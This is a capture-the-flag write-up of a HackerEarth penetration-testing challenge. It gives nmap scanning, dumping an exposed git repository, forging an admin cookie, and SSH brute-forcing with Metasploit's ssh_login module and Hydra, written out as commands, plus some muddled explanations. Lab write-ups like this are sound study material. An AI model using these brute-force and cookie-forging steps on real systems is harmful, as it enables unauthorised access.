HackerEarth’s Cipher Combat 3.0 -VAPT
Hello Medium !
This WriteUp is only for Educational Purposes. Please Don’t try it on different system .
This WriteUp is Solely Based on use of Kali Linux And its Tools.
Task 1 : nmap -A -p- -T3 [IP]
nmap is the tool used to get information about the IP you want to enumerate. You can use it in any configuration but this configuration is best suited as it uses SYNACK method and hence it is a perfect combination .
Changes you can try → change T3 to T1,T2,T4 →Depending on speed
- A → Enable OS detection, version detection, script scanning, and traceroute
- -p- → for all ports
Task 2: Getting the info
You can see nmap has found a github repository for us . Isn’t it just like a jackpot. This task is involves checking the repo out and getting info if you can
Task 3 : Enumerating The folders
This task was pretty cool ! Just use of a SINGLE tool → https://github.com/internetwache/GitTools
You can Read the documentation and use it.
Step 1 : Using Dumper to dump all the files from repository
Step 2: Using Extractor to Take those file to a folder and analyze
Use the Command tree to out directory in this manner
Task 4: Analyze the Files
cat [name shown above]/index.php
this will print the content of index.php file on terminal. Now you have to carefully see the php code and find the passcode.
Result → I found that saving the passcode in md5 format to cookie of WebBrowser will do work of us.
Using javascript code → document.cookie = “key=value”
And hence Admin access was granted on given link
Task 5: Getting Information thru shell activated by admin
For this i have activated the shell. and giving various commands showed the used and various files inside the system.
Task 6 : Finding the Heaven Key
This Was really fun as the link provided wasn’t actually a website but a system itself. With New IP Address
Initial Procedure was Same as Running nmap and Finding the details.
Observation → Finding No Open port but → ssh can be seen in result
This task involves use of metaexploitable as tool . You can also try → Hydra is a brute-force SSH tool.
Procedure →
For Deep Understanding You can check → MetaExploitable
Open terminal (MetaExploitable)
msfconsole // start msf
use auxiliary/scanner/ssh/ssh_login // ssh_login
set RHOSTS [IP_of_target] // remote --> ip
set USERPASS_FILE /usr/share/metasploit framework/data/wordlists/root_userpass.txt //setting the userpass
set VERBOSE false // no extra
run // run the host
stop_on_success // as name suggests
Hydra
hydra -f -L /root/username -P /root/wordlist.txt ssh://[IP_Address]-f —> stop as soon as the couple login/password is found successfully;
-L/-P —> path to the users/passwords dictionary;
ssh://IP address —> service and victim IP address indication.
DAMN ! You have just Brute Forced on client.
We Have A Shell Now → →
sessions -i 1 // start the session
id // id
uname -a // username
exit // exit the shell
Thanks For Reading !!
Plz UPVOTE ! 🙇♂️